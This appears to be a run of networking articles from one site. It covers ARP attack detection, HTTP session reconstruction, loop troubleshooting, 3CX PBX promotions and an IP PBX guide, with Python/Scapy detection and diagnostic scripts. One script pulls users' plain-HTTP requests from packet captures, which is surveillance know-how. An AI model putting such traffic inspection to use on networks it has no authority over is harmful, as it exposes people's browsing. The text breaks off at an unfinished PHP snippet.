By selecting the Source IP in the lower window of the selected packet, we can see the fake IP address 0.136.136.16. This means that any host on the network responding to this packet will be directed to an incorrect and non-existent IP address, indicating an ARP attack or flood.
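The red flags Capsa highlights here – request storms and inconsistent address mappings – can also be watched for with a short script. The sketch below is an illustration only and not Capsa’s detection engine; the interface name and both thresholds are assumptions. It counts ARP requests per sender MAC over ten-second windows and warns when an IP address suddenly changes the MAC it maps to:

```python
# Watch ARP traffic for two classic symptoms: a single MAC generating an ARP
# request storm, and an IP address whose MAC mapping suddenly changes.
# Illustration only; "eth0" and the thresholds are assumptions.
import time
from collections import defaultdict
from scapy.all import sniff, ARP

REQUEST_THRESHOLD = 200                  # ARP requests per 10-second window
requests = defaultdict(int)              # sender MAC -> requests in current window
ip_to_mac = {}                           # last MAC seen claiming each IP
window_start = time.time()

def handle(pkt):
    global window_start
    if not pkt.haslayer(ARP):
        return
    arp = pkt[ARP]
    if arp.op == 1:                                          # who-has (request)
        requests[arp.hwsrc] += 1
    elif arp.op == 2:                                        # is-at (reply)
        known = ip_to_mac.get(arp.psrc)
        if known and known != arp.hwsrc:
            print(f"WARNING: {arp.psrc} moved from {known} to {arp.hwsrc} - possible ARP spoofing")
        ip_to_mac[arp.psrc] = arp.hwsrc
    if time.time() - window_start >= 10:
        for mac, count in requests.items():
            if count >= REQUEST_THRESHOLD:
                print(f"WARNING: {mac} sent {count} ARP requests in 10s - possible ARP scan/storm")
        requests.clear()
        window_start = time.time()

sniff(iface="eth0", filter="arp", prn=handle, store=False)
```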

If you're a network administrator, engineer or IT manager, we strongly suggest you try out Colasoft Capsa today and see how easy you can troubleshoot and resolve network problems and security threats such as ARP Attacks and ARP Flooding.


How to Reconstruct HTTP Packets/Data & Monitor HTTP User Activity with NChronos

HTTP reconstruction is an advanced network security feature offered by nChronos version 4.3.0 and later. nChronos is a Network Forensic Analysis application that captures packets/data around the clock. With HTTP reconstruction, network security engineers and IT managers can uncover suspicious user web activity and check user web history to examine specific HTTP incidents or HTTP data transferred in/out of the corporate network.

Now let's take a look at how to use this new feature with Colasoft nChronos.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

The HTTP reconstruction feature can be easily selected from the Link Analysis area. We first need to carefully select the time range required to be examined e.g 9th of July between 13:41 and 13:49:15. Once the time range is selected, we can move to the bottom window and select the IP Address tab to choose the IP address of interest:

nchronos-how-to-reconstruct-monitor-http-data-packets-captured-1

Figure 1. Selecting our Time-Range and IP Address of interest from Link Analysis

nChronos further allows us to filter internal and external IP addresses, to help quickly identify the IP address of interest. We selected External IP and then address 173.205.14.226.

All that's required at this point is to right-click on the selected IP address and choose HTTP Packet Reconstruction from the pop-up menu. Once HTTP Packet Reconstruction is selected, a new tab will open and the reconstruction process will begin as shown below:


nchronos-how-to-reconstruct-monitor-http-data-packets-captured-2

Figure 2. nChronos HTTP Reconstruction feature in progress.

A progress bar at the top of the window shows the progress of the HTTP Reconstruction. Users are able to cancel the process anytime they wish and once the HTTP Reconstruction is complete, the progress bar disappears.

The screenshot below shows the end result once the HTTP Reconstruction has successfully completed:

nchronos-how-to-reconstruct-monitor-http-data-packets-captured-3

Figure 3. The HTTP Reconstruction process completed

As shown in the above screenshot, nChronos fully displays the reconstructed page in an easy-to-understand manner. Furthermore, all HTTP requests and commands are included to ensure complete visibility of the HTTP protocol commands sent to the remote web server, along with the user's browser and all other HTTP parameters.
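Reconstructing an entire page is well beyond a few lines of script, but the raw material nChronos works from is easy to see for yourself. The Python/Scapy sketch below is an illustration only – the pcap filename is an assumption, and it only works on unencrypted HTTP – listing the request lines and Host headers a client sent:

```python
# List plain-HTTP request lines and Host headers from a saved capture -
# an illustration of the data HTTP reconstruction is built from, not nChronos code.
# The pcap filename is an assumption; HTTPS traffic cannot be read this way.
from scapy.all import rdpcap, IP, TCP, Raw

METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ")

for pkt in rdpcap("capture.pcap"):
    if not (pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw)):
        continue
    payload = bytes(pkt[Raw].load)
    if payload.startswith(METHODS):
        lines = payload.split(b"\r\n")
        request_line = lines[0].decode(errors="replace")
        host = next((l.split(b":", 1)[1].strip().decode(errors="replace")
                     for l in lines[1:] if l.lower().startswith(b"host:")), "?")
        print(f"{pkt[IP].src} -> {host}  {request_line}")
```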

nChronos's HTTP reconstruction feature can prove to be an extremely important security tool for network engineers, administrators and IT Managers who need to keep an eye on incoming/outgoing web traffic. This new feature surpasses web proxy reporting and other similar tools as it is able to completely reconstruct the webpage visited, data exchanged between the server and client, plus help identify/verify security issues with hijacked websites.


How to Use Multi-Segment Analysis to Troubleshoot Network Delay, Packet Loss and Retransmissions with Colasoft nChronos

network-troubleshooting-multi-segment-analysis-with-nchronos-00

Troubleshooting network problems can be a very intensive and challenging process. Intermittent network problems are even more difficult to troubleshoot, as the problem occurs at random times and for a random duration, making it very hard to capture the necessary information, perform troubleshooting, and identify and resolve the network problem.
 
While network analyzers help reveal problems in a network data flow, they are usually limited to examining only one network link at a time, seriously limiting the ability to examine multiple network segments continuously.

nChronos is equipped with a neat feature called multi-segment analysis, providing an easy way for IT network engineers and administrators to compare performance between different links and, based on that comparison, improve network performance by increasing the capacity of the affected link.

Let’s take a look at how we can use Colasoft nChronos’s multi-segment analysis feature to help us detect and deal effectively with network problems.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

Multi-segment analysis provides concurrent analysis for conversations across different links, from which we can extract valuable information on packet loss, network delay, data retransmission and more.

To begin, we open the nChronos Console and select a portion of the trend chart in the Link Analysis window, then from the Summary window below, we right-click one conversation under the IP Conversation or TCP Conversation tab. From the pop-up menu, select Multi-Segment Analysis to open the Multi-Segment Analysis window:

network-troubleshooting-multi-segment-analysis-with-nchronos-01
Figure 1. Launching Multi-Segment Analysis in nChronos

In the Multi-Segment Analysis window, select a minimum of two and maximum of three links, then choose the stream of interest for multi-segment analysis:

 network-troubleshooting-multi-segment-analysis-with-nchronos-02
Figure 2. Selecting a stream for multi-segment analysis in nChronos

When choosing a conversation for multi-segment analysis, if any of the other selected network links carries the same conversation, it will be selected and highlighted automatically. In our example, the second selected link does not have the same data as the primary selected conversation, and therefore there is no data to display in the lower section of the analysis window.

Next, click Start to Analyze to open the Multi-Segment Detail Analysis window, as shown in the figure below:

 network-troubleshooting-multi-segment-analysis-with-nchronos-03
Figure 3. Performing Multi-Segment analysis in nChronos

The Multi-Segment Detail Analysis section on the left provides a plethora of parameter statistics (analyzed below), a time sequence chart, and there’s a packet decoding pane on the lower right section of the window.

The left pane provides statistics on uplink and downlink packet loss, uplink and downlink network delay, uplink and downlink retransmission, uplink and downlink TCP flags, and much more.
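nChronos produces these figures by correlating the same conversation as it appears on each captured link. As a rough, single-capture illustration of just one of those metrics – this is not how nChronos computes it, and the pcap filename is an assumption – the sketch below flags TCP data segments that reuse a sequence number already seen in the same flow, a simple indicator of likely retransmissions:

```python
# Rough single-capture retransmission count: flag data segments that repeat a
# sequence number already seen in the same TCP flow. Illustration only;
# the pcap filename is an assumption.
from collections import defaultdict
from scapy.all import rdpcap, IP, TCP

seen = defaultdict(set)                  # flow (src, sport, dst, dport) -> seq numbers
retransmissions = defaultdict(int)

for pkt in rdpcap("capture.pcap"):
    if not (pkt.haslayer(IP) and pkt.haslayer(TCP)):
        continue
    tcp = pkt[TCP]
    if len(bytes(tcp.payload)) == 0:
        continue                                         # ignore pure ACKs
    flow = (pkt[IP].src, tcp.sport, pkt[IP].dst, tcp.dport)
    if tcp.seq in seen[flow]:
        retransmissions[flow] += 1
    else:
        seen[flow].add(tcp.seq)

for (src, sport, dst, dport), count in retransmissions.items():
    print(f"{src}:{sport} -> {dst}:{dport}  {count} likely retransmissions")
```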

The time sequence chart located at the top, graphically displays the packet transmission between the network links, with the conversation time displayed on the horizontal axis.

When you click on a packet on the time sequence chart, the packet decoding pane will display the detailed decoding information for that packet.

Using the Multi-Segment Analysis feature, Colasoft’s nChronos allows us to quickly compare the performance between two or more network links.


How to Detect Routing Loops and Physical Loops with a Network Analyzer

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-01a

When working with medium to large scale networks, IT departments are often faced with network loops and broadcast storms caused by user error, faulty network devices or incorrect configuration of network equipment. Network loops and broadcast storms are capable of causing major network disruptions and must therefore be dealt with very quickly.

There are two kinds of network loops and these are routing loops and physical loops.

Routing loops are caused by the incorrect configuration of routing protocols, where data packets sent between hosts on different networks are caught in an endless loop, travelling between routers that hold incorrect route entries.

A Physical loop is caused by a loop link between devices. A common example is two switches with two active Ethernet links between them. Broadcast packets exiting the links on one switch are replicated and sent back from the other switch. This is also known as a broadcast storm.

Both types of loops are capable of causing major network outages, wasting valuable bandwidth and disrupting network communications.

We will show you how to detect routing loops and physical loops with a network analyzer such as Colasoft Capsa or Wireshark.

Note: To capture packets on a port that's connected to a Cisco Catalyst switch, users can also read our Configuring SPAN On Cisco Catalyst Switches - Monitor & Capture Network Traffic/Packets

If there are routing loops or physical loops in the network, Capsa will immediately report them in the Diagnosis tab as shown below. This makes troubleshooting easier for network managers and administrators:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-01 
Figure 1. Capsa quickly detects and displays Routing and Physical Loops

Further examination of Capsa’s findings is possible by simply clicking on each detected problem. This allows us to further check the characteristics of the related packets and then decide what action must be taken to rectify the problem.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

Drilling Into Our Captured Information

Let’s take a routing loop for example. First, find out the related conversation using Filter (red arrow) in the MAC Conversation tab. MAC addresses can be obtained easily from the notices given in the Diagnosis tab:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-02

Figure 2. Obtaining more information on a Routing Loop problem

Next, double-click the conversation to load all related packets and additional information. Click on Identifier to view the values of all packets under the Decode column; in our case they are all the same. This effectively means that the packets captured in our example are actually the same packet, continuously transiting our network because it is caught in a loop. For example, Router-A might be sending it to Router-B, which in turn sends it back to Router-A.

 how-to-detect-routing-and-physical-loops-using-a-network-analyzer-03
Figure 3. Decoding packets caught in a routing loop

Now click on the Time To Live section below, and you'll see the Decode value reduce gradually. This is because the TTL value is decreased by 1 each time the packet transits a routing device. When the TTL reaches 0 the packet is discarded, which prevents packets from travelling indefinitely in the event of a routing loop in the network. More information on the ICMP protocol can be found in our ICMP Protocol page:

 how-to-detect-routing-and-physical-loops-using-a-network-analyzer-04
Figure 4. Routing loop causing ICMP TTL to decrease

The method used to analyze physical loops is almost identical, but the TTL values of all looped packets remain the same instead of decreasing as we previously saw. Because the packet is trapped in our local network and never traverses a router, the TTL does not change.

Below we see a DNS Query packet that is trapped in a network loop:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-05
Figure 5. Discovering Network loops and why their TTL values do not decrease
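The same TTL check can also be scripted against a saved capture. The Python/Scapy sketch below is an illustration only – the pcap filename and the copy-count cut-off are assumptions – and groups packets by source, destination and IP Identification value, then reports whether the TTLs of the copies vary (routing loop) or stay constant (physical loop):

```python
# Group repeated packets by IP Identification and inspect their TTLs:
# varying TTLs point to a routing loop, identical TTLs to a physical loop.
# Illustration only; the pcap filename and cut-off are assumptions.
from collections import defaultdict
from scapy.all import rdpcap, IP

ttls_by_id = defaultdict(list)           # (src, dst, IP ID) -> observed TTLs

for pkt in rdpcap("capture.pcap"):
    if pkt.haslayer(IP):
        key = (pkt[IP].src, pkt[IP].dst, pkt[IP].id)
        ttls_by_id[key].append(pkt[IP].ttl)

for (src, dst, ip_id), ttls in ttls_by_id.items():
    if len(ttls) < 5:                    # a few copies is normal; loops produce many
        continue
    if len(set(ttls)) == 1:
        print(f"{src} -> {dst} (ID {ip_id}): {len(ttls)} copies, constant TTL {ttls[0]} - physical loop?")
    else:
        print(f"{src} -> {dst} (ID {ip_id}): {len(ttls)} copies, TTL varies {max(ttls)}->{min(ttls)} - routing loop?")
```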

Advanced network analyzers allow us to quickly detect serious network problems that can cause network outages, packet loss, packet flooding and more.


3CX Unified Communications New Web Client IP Phone, Web Meetings, Click-to-Call & More with V15.5

3cx video conference

The developers of the popular software PBX, 3CX, have announced another major update to their unified communications solution! The latest release, 3CX v15.5, makes the phone system faster, more secure and more reliable with a number of improvements and brand new features.

 Notably, v15.5 brings with it a totally new concept for the PBX system, a completely web-based softphone client that can be launched straight from any open-standards browser. The web client has an attractive, modern interface which makes it incredibly user-friendly, allowing tasks such as call transferring, deskphone control and more to be carried out in a single click.

3CX’s Web-Client provides leading features packed in an easy-to-use GUI

Unified Communications IP PBX That Can Be Deployed Anywhere

Furthering their commitment to providing an easy to install and manage PBX, 3CX has also made deployment easier and more flexible. 3CX can be deployed on MiniPC appliances of leading brands such as Intel, Zotac, Shuttle and Gigabyte meaning that businesses on a budget can ensure enterprise level communications at a fraction of the price.

Additionally, 3CX has ensured more freedom of choice when it comes to deploying the PBX in the cloud, with more supported hosters, such as 1&1, and an easy-to-use 8-step wizard that allows customers and resellers to have a fully configured PBX up and running in minutes.

IP PBX With Integrated Web Conferencing

The brand new web client includes integrated web conferencing completely free of charge without any additional licensing or administration. Video conferences are held directly from the browser with no additional downloads or plugins, and most importantly, this applies to remote participants as well!

3CX: IP PBX Web Client with integrated Web Conferencing Free of Charge!

More Reliable, Easier to Control Your Deskphone or Smartphone

By implementing the uaCSTA standard for deskphones, 3CX has significantly improved remote control of phones. This has ensured more reliable control of IP phones regardless of the location of the extension or whether or not the PBX is being run on-premise or in the cloud. Moreover, the 3CX smartphone clients for Android and iOS can now also be remote controlled.

3CX’s Click-to-Call Feature from any Web page or CRM

Additional Improvements & Features Include:

  • Click2Call Chrome Extension to dial from any web page or CRM
  • Integrated Hotel Module
  • Support for Google Firebase PUSH
  • Achieve PCI compliance in financial environments

3CX’s Unified Communications IP PBX enhanced to include New Web Client, Rich CTI/IP Phone Control, Free Hotel Module & Fax over G.711 - Try it Today for Free!

3CX has done it again! Working on its multi-platform, core v15 architecture, the UC solution developers have released the latest version of its PBX in Alpha, v15.5. The new build includes some incredibly useful features including a web client - a completely new concept for this product.

3CX has made a big effort to ensure its IP PBX product remains one of the best free UC IP PBX systems available!

The new 3CX Intuitive web client that leaves competitors miles behind

User-Friendly & Feature-Rich

The 3CX Web Client, built on the latest web technology (angular 4), currently works in conjunction with the softphone client for calls, and allows users to communicate and collaborate straight from the browser. The modern, intuitive interface combines key 3CX features including video conferencing, chat, switchboard and more, improving overall usability.

Improved CTI/IP Phone Control

3CX IP PBX cti ip phone call

Desktop call control has been massively improved. Even if your phone system is running in the cloud, supported phones can be reliably controlled from the desktop client. This improvement follows the switch to uaCSTA technology. Moreover, a new Click 2 Call Chrome extension makes communication seamless across the client and browser.

Reintroduction Of The Hotel Module Into 3CX

The Hotel Module has been restored into 3CX and is now included free of charge for all PRO/Enterprise licenses - great news for those in the hospitality industry.

Additionally, 3CX now supports Google’s FIREBASE push, and fax over G711 has been added amongst various other improvements and features.


How to Get a Free Fully Functional Cloud-Based Unified Communications PBX with Free Trial Hosting on Google Cloud, Amazon or OVH!

3cx ip pbx client console

Crazy as it might sound, there is one Unified Communications provider that is giving out free, fully functional cloud-based PBX systems with no obligation for its users/customers.

3CX, a leader in Unified Communications, has just announced the availability of its new PBX Express online wizard designed to easily deploy a PBX in your own cloud account

3CX’s Advanced Unified Communications features were recently covered in our article The Ultimate Guide to IP PBX and VoIP Systems - The Best Free IP PBXs For Businesses. In the article we examined the common components of a modern Unified Communications platform and how they are all configured to work together enabling free real-time communications and presence for its users no matter where they are in the world.

Now Free Cloud-based services are added to the list and the features are second to none plus they provide completely Free Trial Hosting, Domain Name, associated SSL certificates and much more!

3CX’s intuitive dashboard allows quick & easy administration with zero prior experience!

Here’s what the Free Unified Communications PBX includes:

  • Free fully-functional Unified Communications PBX
  • Up to 8 simultaneous calls
  • Ability to make/receive calls on your SIP phones or mobile devices via IP
  • Full Support for iPhone and Android devices
  • Full support for iPads and Tablet devices
  • Presence Services (See who’s online, availability, status etc.)
  • Instant Messaging
  • Video conferencing
  • Desktop Sharing
  • Zero Maintenance – Everything is taken care of for you!
  • Free Domain Name selection (over 20 countries to select from!)
  • Free Trial Hosting on Google Cloud – Amazon Web Services or OVH!
  • SSL Certificate
  • Fast deployment- no previous experience required
  • Super-easy administration
  • …and much more!

3CX’s Unified Communications PBX system is an advanced, flexible PBX that can be run locally in your office at no cost, which is why thousands of companies are switching to 3CX. With the choice of an on-premises solution that supports Windows and Linux operating systems, and now the free cloud-based hosting, it has become a go-to solution for companies seeking to move to an advanced Unified Communications system while dramatically cutting telecommunication costs.

3cx ip pbx smartphone iphone client

Thanks to its support for any SIP-based IP phone and mobile device (iPhone, Android, iPad, Tablet etc.) the 3CX IP PBX has quickly become the No.1 preferred solution.

3CX’s commitment to its customers and product is outstanding, with regular updates covering its main UC PBX product as well as the mobile device clients - ensuring customers are not left with long-outstanding problems or bugs. 3CX recently announced a number of bug fixes and enhancements for the 3CX Client for Android as well as the 3CX Client for Mac, confirming once again that it is determined not to leave customers in the dark and to continually improve its services and product quality.

Read The Ultimate Guide to IP PBX and VoIP Systems - The Best Free IP PBXs For Businesses article for more information on the 3CX UC solution.


3CX Unified Communication Leading Free IP PBX Brings Linux Edition On-Par with Windows Edition

3CX Free IP PBX Unified Communications Solution

3CX, developer of the software-based unified communications solution, has announced the release of 3CX V15 Service Pack 5 which brings the final Linux version of the PBX. The update achieves complete feature parity with the popular Windows version of the software. The company also reports that SP5 has added further automation of admin management tasks and made hosting of the system in the cloud easier with leading cloud providers.

3CX Unified Communication Suite and Capabilities

Read our Ultimate Guide to IP PBX - Unified Communications - The Best Free IP PBXs for Today's Businesses

Improvements to Auto Updates / Backups

  • Automatic uploading of backups to a Google Drive Account.
  • Automatic restoration of backups to another instance with failover.
  • Easier configuration of failover.
  • Automatic installation of OS security updates for Debian.
  • Automatic installation of 3CX tested product updates.
  • Automatic downloads of tested phone firmwares and alerts for outdated firmware.
  • A Labs feature to test upcoming updates released for BETA.
  • Digital receptionists can be configured as a wake-up call service extension.
  • GMail or Office 365 accounts can be more easily configured for notification emails from the PBX.
  • Improved DID source identification.
  • Windows and Mac clients are now bundled with the main install.
  • Automatic push of chat messages to the iOS and Android smartphone clients.

The Ultimate Guide to IP PBX and VoIP Systems. The Best Free IP PBXs For Businesses

3CX Unified Communications

VoIP/IP PBXs and Unified Communication systems have become extremely popular over the past decade and are the No.1 preference when upgrading an existing or installing a new phone system. IP PBXs are based on the IP protocol, allowing them to use the existing network infrastructure and deliver enhanced communication services that help organizations collaborate and communicate from anywhere in the world at minimal or no cost.

This article explains the fundamentals of IP PBX systems, how IP PBXs work, what are their critical VoIP components, explains how they can connect to the outside world and shows how companies can use their IP PBX – Unified Communications system to save costs. We also take a look at the best Free VoIP PBX systems and explain why they are suitable for any size small-to-medium organization.

VOIP PBX – The Evolution of Telephone Systems

Traditional Private Branch Exchange (PBX) telephone systems have changed a lot since the spread of the internet. Slowly but surely, businesses are phasing out analogue systems and replacing them with IP PBX alternatives.

A traditional PBX system features an exchange box on the organization’s premises where analogue and digital phones connect alongside external PSTN/ISDN lines from the telecommunications company (telco). It gives the company full ownership, but is expensive to set up and most frequently requires a specialist technician to maintain, repair and make changes.

Analogue-Digital PBX with phones and two ISDN PRI lines 

A typical Analogue-Digital PBX with phones and two ISDN PRI lines

Upgrading to support additional internal extensions would usually translate to additional hardware cards being installed in the PBX system plus more telephone cabling to accommodate the new phones. When a company reached its PBX maximum capacity (either phones or PSTN/ISDN lines) it would need to move to a larger PBX, resulting in additional costs.

IP PBXs, also known as VoIP systems or Unified Communication solutions, began penetrating the global PBX market around 2005 as they offered everything a high-end PBX offered, integrated much better with desktop applications and software (e.g. Outlook, CRMs etc.) and supported a number of important features PBXs were not able to deliver. IP PBX and Unified Communication systems such as 3CX are able to deliver features such as:

  • Integration with existing network infrastructure
  • Minimizing the cost of upgrades
  • Using existing equipment such as analogue phones, faxes etc.
  • Desktop/mobile softphones that replaced the need for physical phone devices
  • Delivering full phone services to remote offices without requiring separate PBX
  • Allowing mobile users to access their internal extension via VPN or other secure means
  • User-friendly Web-based management interface
  • Support for virtualized-environments that increased redundancy level and dramatically decreased backup/redundancy costs
  • Supported third party software and hardware devices via non-proprietary communication protocols such as Session Initiation Protocol (SIP)
  • Using alternative Telecommunication providers via the internet for cheaper call rates

The features offered by IP PBXs made them an increasingly popular alternative for organizations that were seeking to reduce telecommunication cost while increasing productivity and moving away from the vendor-proprietary solutions.

Why Businesses are Moving to IP PBX solutions

According to surveys made back in 2013, 96% of Australian businesses were already using IP PBXs. Today it’s clear that the solution has huge advantages. IP PBX offers businesses increased flexibility, reduced running costs, and great features, without a premium. There are so many advantages that it’s difficult for organizations to justify traditional analogue/digital PBXs. Even market leaders in the PBX market such as Siemens, Panasonic, Alcatel and others had to adapt to the rapidly changing telecommunications market and produce hybrid models that supported IP PBX features and IP phones, but these were still limited when compared with a full IP PBX solution.

When an IP PBX is installed on-site it uses the existing LAN network, resulting in low latency and less room for interference. It’s also much easier to install than other PBX systems. Network engineers and Administrators can easily configure and manage an IP PBX system as most distributions come with a simple user interface. This means system and phone settings, call routing, call reporting, bandwidth usage and other settings can be seen and configured in a simple browser window. In some cases, employees can even configure their own preferences to suit their workflow.

Once installed, an IP PBX can run on the existing network, as opposed to a whole telephone infrastructure across business premises. That means less cable management and the ability to use existing Ethernet cables, resulting in smaller starting costs. This reduction in starter costs can be even more significant if the company has multiple branches in different places. Internet Leased Lines with unlimited usage plans mean voice calls can be transmitted over WAN IP at no extra cost.

In addition, firms can use Session Initiation Protocol (SIP) trunking to reduce phone bills for most calls. Communications are routed to the Telco using a SIP trunk via the IP PBX directly or a Voice Gateway. SIP is an IP-based protocol which means the Telco can either provide a dedicated leased line directly into the organization’s premises or the customer can connect to a Telco’s SIP server via the internet. Usually main Telco lines are provided via a dedicated IP-based circuit to ensure line stability and low latency.

With SIP trunks Telco providers usually offer heavily reduced prices over traditional methods such as PSTN or ISDN circuits. This is especially true for long-distance calls, where communication can be made for a fraction of a price when compared to older digital circuits.

Savings on calls via SIP trunk providers can be so significant that many companies with old Legacy PBXs have installed an IP PBX that acts as a Voice Gateway, which routes calls to a SIP provider as shown in the diagram below:

Connecting an Analogue-Digital PBX with a SIP Provider via a Voice Gateway

In this example an IP PBX with Voice Gateway (VG) capabilities is installed at the organization. The Voice Gateway connects on one end with the Analogue - Digital PBX using an ISDN BRI interface providing up to 2 concurrent calls while at the other end it connects with a SIP provider via IP.

The SIP provider can be reached via the internet, usually using a dedicated internet connection, or even a leased line if the SIP provider has such capabilities. The Analogue - Digital PBX is then programmed to route all local and national calls via the current telco while all international calls are routed to the SIP provider via the Voice Gateway.

The organization is now able to take advantage of the low call costs offered by the SIP provider.

The digital nature of IP PBX makes it more mobile. Softphone applications support IP PBX and let users make calls over the internet from their smartphone or computer. This allows for huge portability while retaining the same extension number. Furthermore, this often comes at a flat rate, avoiding per-minute fees. Advanced Softphones support a number of great features such as call recording, caller ID choice, transfer, hold, voice mail integration, corporate directory, just to name a few.

A great example is 3CX’s Free Windows softphone, which is a great compact application under continuous development that delivers everything a mobile desktop user would need to communicate with the office and customers while on the road or working from home:

3CX windows softphone client & Presence

3CX Windows Softphone and Presence application

IP PBX, being a pure-IP based solution, means that users are able to relocate between offices or desks without requiring changes to the cabled infrastructure. IP phones can be disconnected from their current location and reconnected at their new one. With the help of a DHCP server the IP phone will automatically reconfigure and connect to the IP PBX with the user’s internal extension and settings.

A technology called Fixed Mobile Convergence or Follow-me can even allow employees to make a landline call on their mobile using WiFi, then move to cellular once they get out of range. The cellular calls can be routed through the IP PBX when on-site through their IP phone or local network. When users are off-site the mobility client automatically registers with the organization’s IP PBX via the internet extending the user’s internal extension to the mobile client. Calls are automatically routed to the mobile client without the caller or co-workers being aware.

Another big advantage is the unification of communications. Rather than a separate hardware phone, email, voicemail and more, companies can roll them into one system. In many cases, softphones can be integrated into the existing software such as Outlook, CRM, ERP and more. What’s more, employees can receive voicemails and faxes straight to their email inbox.

That’s not to say VoIP is without flaws. For a start, it relies heavily on the network, so issues can bring the call system down if a backup isn’t implemented or there are big network problems. It’s also less applicable for emergency services because support for such calls is limited. A lot of VoIP providers offer inadequate functionality and the communications are often untraceable. Though an IP PBX is the best solution for most businesses, it depends on the individual circumstances.

Main Components of a Modern Unified Communication IP PBX

A Unified Communication IP PBX system is made up of several important components. Firstly, there is the computer needed to run the IP PBX software. This is the Call Control server that manages all endpoint devices, call routing, voice gateways and more.

The IP PBX software is loaded on the server and configured by the network administrator. Depending on the vendor, the IP PBX can be integrated into a physical device such as a router (e.g. Cisco CallManager Express) or it might be a software application installed on top of the server’s operating system (e.g. 3CX IP PBX).

In 3CX’s case, the IP PBX software can run on the Windows platform (workstation or server) or on Linux. 3CX also supports the Hyper-V and VMware virtualization platforms, helping dramatically increase availability and redundancy at no additional cost.

IP PBX & VoIP Network Components

VoIP Gateways, also known as Voice Gateways or Analogue Telephony Adaptors (ATA), play a dual role – they act as an interface between older analogue devices such as phones and faxes and the newer VoIP network, allowing those devices to connect to it. The VoIP Gateway in this case is configured with the extensions assigned to these devices and registers with the IP PBX on their behalf using the SIP protocol. When an extension assigned to an analogue device is called, the IP PBX sends the signal to the VoIP Gateway, which produces the necessary ringing signal to make the analogue device ring. As soon as the phone is picked up, the VoIP Gateway connects the call, acting as a “router” between the analogue device and the VoIP network. ATA is usually the term used for a VoIP Gateway that connects a couple of analogue devices to the VoIP network.

VoIP Gateways are also used to connect an IP PBX to the Telco, normally via an ISDN (BRI or PRI) or PSTN interface. Incoming and outgoing calls will traverse the VoIP Gateway connecting the IP PBX with the rest of the world.

IP phones are the physical devices used to make and accept phone calls. Depending on the vendor and model, these can be simple phones without a display or high-end devices with colour multi-touch displays and enhanced functions such as multiple line support, speed dials, video conferencing and more. Popular vendors in this field include Cisco, GrandStream, Yealink and others. All IP phones communicate using the non-proprietary SIP protocol. This makes it easy for organizations to mix and match different hardware vendors without worrying about compatibility issues.

In the case of a softphone, the application runs on a desktop computer or smartphone and provides all the services of an IP phone plus a lot more. Users can also connect a headset, microphone or speakers if needed.

3CX’s free SIP-based softphone for Android (left) and iPhone (right) both provide a wealth of functions no matter where users are located

However, the key part of a Unified Communication IP PBX is its ability to use this existing hardware and software to bring multiple media together intuitively. Outlook integration, for example, allows you to make softphone calls straight from the email interface, removing the need to look up long lists of contact details.

This is combined with the integration of instant messaging so that call takers can correspond with other staff if they’re giving tech support. It can be further enhanced by desktop sharing features to see exactly what a user is doing, as well as SMS, fax, and voicemail.

More advanced Unified Communications platforms use speech recognition for automatic, searchable transcriptions of calls. Large organizations are even implementing artificial intelligence in their workflow. Microsoft’s virtual support assistant looks at what employees are doing and provides relevant advice, information, and browser pages. The ultimate goal is for an employee to obtain everything they need with minimal effort.

How an IP PBX Works

It’s important to understand how each of these components works to form a cohesive whole. Each IP phone is registered with the IP PBX server, which is usually just a specially configured PC running the Windows or Linux operating system; the OS can also run on a virtual machine.

Advanced IP PBX systems such as 3CX support both Windows and Linux operating systems and can also be hosted on virtualized platforms such as Hyper-V and VMware, offering great value for money.

The IP PBX server creates a list that contains the Session Initiation Protocol (SIP) address of each phone. For the unfamiliar, SIP is the most popular protocol for transmitting telephone data over networks. It is an application-layer protocol in the OSI model and integrates elements from HTTP and SMTP. As such, the identifying SIP addresses look like a mash-up of an email address and a telephone number, for example sip:1001@pbx.example.com.

SIP Accounts

SIP endpoint accounts (IP Phones, softphones, VoIP Gateways) are configured on the IP PBX with their extension and credentials. Similarly the endpoint devices are configured with the IP PBX’s IP address and their previously configured accounts. Once the SIP endpoint device registers to the IP PBX it is ready to start placing and receiving phone calls.

SIP Endpoint Registering to an IP PBX System

Once a user places a call, the system determines whether the call is destined for a phone on the same system or for an external number. Internal calls are identified via the SIP address and routed directly between the endpoints over the LAN. External calls are routed to the telco provider via the Voice Gateway or a SIP trunk, depending on the setup.

Naturally, these calls are made from the hardware and softphones mentioned earlier. Hardware IP phones connect to the network using a standard RJ-45 connector, replacing the older RJ-11 connectors used by the analogue telephones.

Voice Codecs – G.711, G.729, G.722

Audio signals from the IP phones must be converted into a digital format before they can be transmitted. This is done via a codec, which compresses the audio for transmission and decodes it on playback. There are several different types of codec, and the one you use determines both the audio quality and the amount of bandwidth consumed.

SIP endpoints located on the LAN almost always use the G.711 codec, which applies 1:2 compression and produces a 64Kbps audio stream; adding 23.2Kbps of IP overhead results in a bitrate of 87.2Kbps per call. It delivers high, analogue-telephone quality but comes with a significant bandwidth cost, which is not a problem on local networks where speeds average 1Gbps.

When a SIP endpoint is on the road, away from the office, moving to a less bandwidth-intensive codec at the expense of voice quality is usually desirable. The most commonly used codec in these cases is G.729, which provides acceptable audio quality for just a 31.2Kbps bitrate that breaks down to 8Kbps of audio plus 23.2Kbps of IP overhead. It’s similar to the call quality of your average cell phone.

G.711 vs G.729 Call - Bandwidth Requirements per call

G.722 delivers a better call quality than even PSTN, but is best for high bandwidth scenarios or when great audio quality is essential.

SIP Trunks

Finally, SIP trunks are also configured with codecs for incoming and outgoing phone calls. This is why, when connecting to an internet-based SIP provider, special consideration must be taken to ensure there is enough bandwidth to support the number of simultaneous calls desired. For example, to connect to a SIP provider and support up to 24 simultaneous calls using the G.711 codec for high-quality audio, we would require 87.2Kbps x 24 = 2092.8Kbps of bandwidth, or 2.043Mbps at full line capacity.
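
As a quick way to repeat this calculation for other codecs or call volumes, here is a minimal PHP sketch using the per-call figures quoted above; the 23.2Kbps IP overhead is an approximation and real-world figures vary with packetization and transport:

<?php
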